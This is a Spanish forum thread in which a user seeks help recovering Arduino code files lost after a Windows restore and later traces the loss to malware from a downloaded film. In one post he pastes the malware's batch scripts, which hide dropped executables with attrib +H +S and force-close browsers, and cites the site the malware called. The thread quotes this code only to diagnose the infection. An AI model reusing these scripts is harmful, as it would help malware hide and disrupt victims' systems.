[AYUDA] archivos desaparecidos tras restaurar sistema

Tema en 'OFF TOPIC' iniciado por juanvivo, 1 Abr 2013.

1. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Pues tal y como dice el titulo, tras restaurar el sistema para solucionar un problema que me habia surgido se ha solucionado ese problema pero con efectos secundarios indeseables...

Resulta que ha desaparecido todos los archivos que habia dentro de un par de carpetas, curiosamente los unicos que me importan de todo el ordenador y de los que no tengo copia externa.

SI hago uso del buscador en inicio, aparecen como si estuvieran en su ubicacion, pero al darles para abrirlos o ir a la carpeta dice que"hace referencia a una ubicacion que no esta disponible".

Los archivos son el resultado de varios dias de programacion y desarrollo de un cacharrito en arduino.

Se os ocurrre algo?

#1 juanvivo, 1 Abr 2013
    Última edición: 2 Abr 2013
  2. Iniciado Miembro

Iniciado
    Me Gusta recibidos:
    0
    Que mala suerte,a mi me hizo formatear dos veces por culpa de restaurar sistema y desde entonces ni una mas.

Prueba con easy recovery profesional portable,este programa me funciona muy bien incluso despues de formatear un disco,pero cuidado por que si sigues instalando programas o metiendo mas archivos al disco puedes machacar los datos que has perdido y entonces ya es imposible de recuperarlos.

Otra cosa que se me ocurre es el virus recycler,pero no creo que sea por que en ese caso te desaparecerian muchos mas archivos.

Suerte...

3. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    he probado handy recovery instalandolo en un pendrive y no encuentra nada borrado. Pero quizas tenga que ver con que de alguna forma estan ahi (lo que decia antes de que el buscador del inicio si los encuentra...).

4. Iniciado Miembro

Iniciado
    Me Gusta recibidos:
    0
  5. Manolo_B Maestro FPV

Manolo_B
    Me Gusta recibidos:
    0
    Arranca el ordenador con un liveCD de la distribucion Linux que más te guste y explora tu disco duro a ver si realmente los archivos "están ahí" . No te debiera resultar muy difícil salvarlos a un pendrive si realmente "están".

El método suele resultar bastante seguro, entre otras cosas porque las distribuciones Linux corriendo en modo live CD por norma no permiten acceso de escritura a los discos físicos; sólo lectura salvo que se especifique muy expresamente lo contrario.

6. Iniciado Miembro

Iniciado
    Me Gusta recibidos:
    0
    Efectivamente,entrar a traves de un liveCD tambien es otra posibilidad a probar..

7. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Iniciado, sera una opcion cuando pruebe las demas que no tenga que escribir en el disco duro.

Manolo, puedes indicarme el proceso un poco mas para torpes?

8. Manolo_B Maestro FPV

Manolo_B
    Me Gusta recibidos:
    0
  9. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Pues busco pues. El caso es que estoy dando vueltas y solo veo livecd para quitar virus y y cosas asi, no see cual me valdria solo como navegador de archivos...

10. Manolo_B Maestro FPV

Manolo_B
    Me Gusta recibidos:
    0
  11. juande Miembro Activo

juande
    Me Gusta recibidos:
    0
    Hola

hace tiempo tube un problema con el disco duro y tambien perdi algunas carpetas.......

probe lo de "cargar" un linux,el ubuntu, y nada.Pinche mi disco duro en otro XP y me lo reconocia,pero nada de los archivo.
    Buscando me tope con un programa,Getdataback,mano de santo,recupere mis archivos facilmente.

busca un poco,saludos

12. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    pues el getdataback lo tengo instalado en el discoduro en cuestion y no ha encontrado nada. Voy a ver si pinchando el disco duro en otro ordenador es distinto...

13. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    rizando el rizo, he pensado en probhar a restaurar en alguno de los 8 o 10 puntos de restauracion que tenia disponibles, a ver si habia suerte y, sorpresa! despues de reiniciar el ordenador para sacarle el disco duro han desaparecido todos los puntos de restauracion!

:censurado:

Algo mas puede salir mal?

14. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Ninguno d elos enlaces funciona. Me mandan a paginas que no existen.

15. Manolo_B Maestro FPV

Manolo_B
    Me Gusta recibidos:
    0

Ya les vale. :blink:

También puedes probar con ésta, es una distribución especializada en determinado campo (interesante) que no viene a cuento ahora mismo, pero para el caso general que nos ocupa valdrá igualmente: http://descargas.seguridadwireless.es/?dir=isos

16. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Pues el getdataback los encuentra, los descargo bien a otro disco duro, pero cuando intento abrirlos estan encriptados, o abiertos como si fuesen otro tipo de archivos o con el contenido cambiado... :sad: Un ejemplo cuando intento abrir el codigo arduino de un probador de servos sale algo como

Insertar CODE, HTML o PHP:
    ZString Binary Format en_US 
    seguido de caracteres aleatorios o algo asi...

Iniciado, tu virus cambia el nombre o el contenido de los archivos?

Adjuntos:

17. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Pues definitivamente algo asi pasa. Quizas los archivos esten en el disco duro pero bajo otro nombre. He intentado abrir un archivo de programacion arduino que he conseguido rescatar y al abrirlo me sale un tutorial de otra cosa...

Madre mia, a ver como lo encuentro ahora...

18. eslanek Gurú FPV

eslanek
    Me Gusta recibidos:
    0
    A ver en teoria deberias de poder desacer la ultima restauracion y volver al punto donde la realizastes. Los programas para encontrar archivos borrados no te valen ya que no lo borrastes. Prueba lo que te dicen los compañeros de entrar desde linux. Yo tengo instalados los dos sistemas y desabilitado restaurar sistema.

19. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Ya deshice la restauración sin resultado. Ahora han desaparecido todos los puntos de restauración. con el software getdataback encuentra los archivos y los recupera, pero parece que tienen los índices cambiados o algo asi, sale otro contenido. creo que ha sido un virus.

20. yo_mismo Miembro

yo_mismo
    Me Gusta recibidos:
    0
    Has probado con un Live CD??

Las restauraciones de windows pueden hacer cosas raras si el sistema no estaba muy fino. A mi me ha pasado que por culpa de una restauración tuve que formatear y reinstalar windows desde cero.

Con un Live CD puedes rescatar los datos del disco curo siempre que no estén corruptos.

Para que te sea facil de utilizar, hay un Live CD con la apariencia y funcionamiento de un Windows XP. Se llama EDR Commander (o algo así). Te descargas la ISO, la grabas en un CD o DVD, arrancas el ordenador con el CD insertado y arrancará el Live CD.

Prueba esto.

EDITO: Te dejo un video para que veas como funciona. metes el cd y arrancas el PC. Espera a que arranque y te encuentras con un "windows XP". Buscas lo que necesitas, lo copias a un pendrive, sacas el cd, reinicias y tienes el equipo como siempre, pero con los datos que necesitas en un pendrive.

http://www.youtube.com/watch?v=uviTcXv8rQk

21. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    He probado con 3 livecd distintos y no he sido capaz de hacer funcionar ninguno. Los dos primeros directamente no cargan, el tercero me deja en una especie de msdos que no se manejar.

EL edr commander, no encuentro una iso para quemar, o encuentro isos sospechosas...

Abajo os dejo una captura para que veais que aparecen en el getdataback, pero al intentar leerlos el contenido no es el que tenian.

Adjuntos:

22. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    lo que se ve si entro normalmente en el mismo directorio sin el getdataback

Adjuntos:

23. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    joer, si es que hasta el tamaño de los archivos que aparece en el getdataback es correcto...

24. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    sigo con ello, pero casi lo doy por perdido. He recordado que ejecute un archivo sospechoso, lo he buscado en la papelera y he encontrado que es un acceso directo a esto:

%systemroot%\System32\cmd.exe /c notepad.ini

el archivo notepad.ini contiene cosas cuanto menos sospechosas...
    exterminator.bat ... el nombre lo dice todo:

@echo off
    attrib +H +S C:\ProgramData /D /S
    attrib +H +S C:\WindowsRecoveryEnvironment /D /S
    ping localhost -n 1 >nul
    attrib +H +S C:\ProgramData\Cygwin.bat
    attrib +H +S C:\ProgramData\End.bat
    attrib +H +S C:\ProgramData\Exterminator.bat
    attrib +H +S C:\ProgramData\Leeme.txt
    attrib +H +S C:\ProgramData\ultrafiles.bat
    attrib +H +S C:\ProgramData\nircmd.exe
    attrib +H +S C:\ProgramData\tk.bat
    attrib +H +S C:\ProgramData\UpdateWindows.bat
    attrib +H +S C:\ProgramData\WGET.EXE
    attrib +H +S C:\ProgramData\Cygwin.exe
    attrib +H +S C:\ProgramData\ImagingDevices.exe
    attrib +H +S C:\ProgramData\System.exe
    attrib +H +S C:\WindowsRecoveryEnvironment\System.exe
    exit

end.bat ...

@echo off
    Taskkill /IM iexplore.exe /F
    Taskkill /IM firefox.exe /F
    Taskkill /IM chrome.exe /F
    Taskkill /IM opera.exe /F
    Taskkill /IM safari.exe /F
    Taskkill /IM Cygwin.exe /F
    Taskkill /IM System.exe /F
    Taskkill /IM cmd.exe /F
    exit

y una llamada a
    http://scarfacetheworldsisyours.blogspot.com/

....

cuantas mas horas paso delante del ordenador mas estupido creo que soy y mas caigo en pipioleces.

Adjuntos:

• virus.jpg
      virus.jpg
      Tamaño de archivo:
      136,4 KB
      Visitas:
      49
  25. laposte Miembro

laposte
    Me Gusta recibidos:
    0
    No creo que tenga nada que ver, parece que los archivos de ese RAR era para validar Windows o el Office ¿no te acuerdas lo que era?
    De todos modos es muy difícil a estas alturas que puedas recuperar algo, los clusters ya deben estar sobreescritos, para recuperar algo deberias haber apagado el disco y conectarlo en otro equipo para recuperar los datos casi inmediatamente de tal forma que windows no reescriba en él.

Hecha un vistado por aqui.

http://www.pandorarecovery.com/local/es/

26. Iniciado Miembro

Iniciado
    Me Gusta recibidos:
    0
    Veo que la cosa va paradilla,vamos a darle movimiento a esto.Ya me imagino que estas desde otro pc.Ve aqui http://www.hirensbootcd.org/download/ y descarga este liveCD (La descarga esta abajo al final de la pagina).Al entrar a traves del liveCD selecciona minixp.
    Se me olvidaba,desconecta internet para que no bajen actualizaciones de antivirus o adobe,etc.
    si no encuentras tus archivos con el,pasamos a la segunda parte.

27. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Es lo primero que hice cuando me di cuenta de que no estaban los archivos.

Iniciado, voy a bajarme el livecd que dices. De todas formas tanto con el recuva como con el getdataback he conseguido encontrar y guardar los archivos donde se supone que estaban, pero como digo, el contenido esta cambiado. EN vez de codigo arduino tienen un tutorial, info en hexadecimal, un jpg creo, el contenido de otros archivos de texto...

Lo dicho, sin mucha esperanza, descargando el livecd que me aconsejas.

28. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    ok, descargado , grabado en cd y probado.

No estan los archivos...

Cual es la segunda parte? :smile:

29. laposte Miembro

laposte
    Me Gusta recibidos:
    0
  30. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    No he probado con ese programa en particular, pero si con los que comento y el resultado es el mismo...

31. Iniciado Miembro

Iniciado
    Me Gusta recibidos:
    0
    la segunda es saber si es por virus.ve aqui http://kuyne.blogspot.com.es/2012/0.../2012/07/que-es-el-virus-recycler-y-como.html y descarga el archivo "medicina" es un bat de 102k.Ejecutalo desde la raiz de C como administrador.Como pesa muy poco no creo que te pise mucho.Este virus en sus ultimas versiones cambia las extensiones de los archivos y no se pueden ver,se necesita otro programa para volver a utilizarlas.

Cuando este virus entra suele eliminar archivos y carpetas completas,pero el muy jo:censurado:do no lo elimina todo (por ejemplo si en mis documentos tienes 10 carpetas ygual desaparecen solo 6 y las demas las deja) por eso seria bueno tambien mirar a ver si te faltan mas archivos.

Suerte...

32. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    pues solo he echado en falta los unicos que me importan...

ya ejecute la medicina esa, pero me daba error. Da "acceso denegado" a cada una de las entradas que hace. Es un cmd, no un bat.

33. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    ese archivo venia con una pelicula que baje...tonto de mi.

34. Iniciado Miembro

Iniciado
    Me Gusta recibidos:
    0
    Si es verdad es cmd,es que voy de cabeza.Lo de acceso denegado es normal,es asi como funciona,pero dejalo correr hasta el final.Me imagino que lo que has perdido estaria en C por que si estaba en otra particon tendrias que correrlo desde esa particion.

35. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Sí. Estaba en mis documentos.

36. laposte Miembro

laposte
    Me Gusta recibidos:
    0
    A que no estan borrados sino. ocultos, usa el comando attrib con -h y - s o dile sl explorer que te muestre los arhivos de sistema u ocultos.

37. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    tengo activado que se muestren carpetas y archivos ocultos. No creo que vaya por ahi...

38. Manolo_B Maestro FPV

Manolo_B
    Me Gusta recibidos:
    0

Archivos y carpetas ocultos y de sistema, que implica un "segundo paso de autorizacion explicita" si se tira de GUI para definirlo.

El bat ése hacía uso intensivo del "+H" y el "+S" para ocultar su rastro; por éso lo del "-H" y "-S"

39. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    entonces a ver que me entere, entro a cmd y ejecuto "attrib -h -s"? es mas complicado que eso, no?

40. laposte Miembro

laposte
    Me Gusta recibidos:
    0
    Ejecuta cmd y entra con los comandos del dos en la carpeta donde se ubiquen los archivos y aplica el comando "attrib -s -h -r /s /d *.*".
    Suerte.

41. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Nada, no aparece nada nuevo...

42. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Si no se os ocurre nada mas, procedere a formatearlo para partir de una base limpia y estar seguro de que no quedan resquicios de virus ni otras inmundicias por ahi... Doy por perdido el trabajo de programacion y ya he empezado de nuevo.

Juanvivo 0, virus 1...

43. Manolo_B Maestro FPV

Manolo_B
    Me Gusta recibidos:
    0
    Visto que ese bicho es un "trilero" (a tenor del resultado del GetDataBack), existe una remota posibilidad de que una búsqueda basada en contenido del archivo (poner como criterio de búsqueda una cadena de texto específica del lenguaje de programación Arduino) incluyendo en la opciones avanzadas de búsqueda los archivos ocultos y/o de sistema y sus subcarpetas, pueda tener una remota posibilidad de éxito.

Se va a tirar horas si el disco tiene mucho contenido, pero si no tienes prisa menos da una piedra.

44. juanvivo Maestro FPV

juanvivo
    Me Gusta recibidos:
    0
    Ya lo intente con el ultraedit... si bien no estoy seguro de que buscase tambien en archivos ocultos...

Na, no merece la pena el tiempo que estoy gastando, ni el que estais gastando vosotros. Es una putada, varios dias y muchas horas de trabajo a la basura. Pero ya he empezado de nuevo y voy bastante avanzado.

Gracias a todos por vuestra ayuda.

45. Manolo_B Maestro FPV

Manolo_B
    Me Gusta recibidos:
    0
    Me refería a la búsqueda con el propio Windows.

Compartir esta página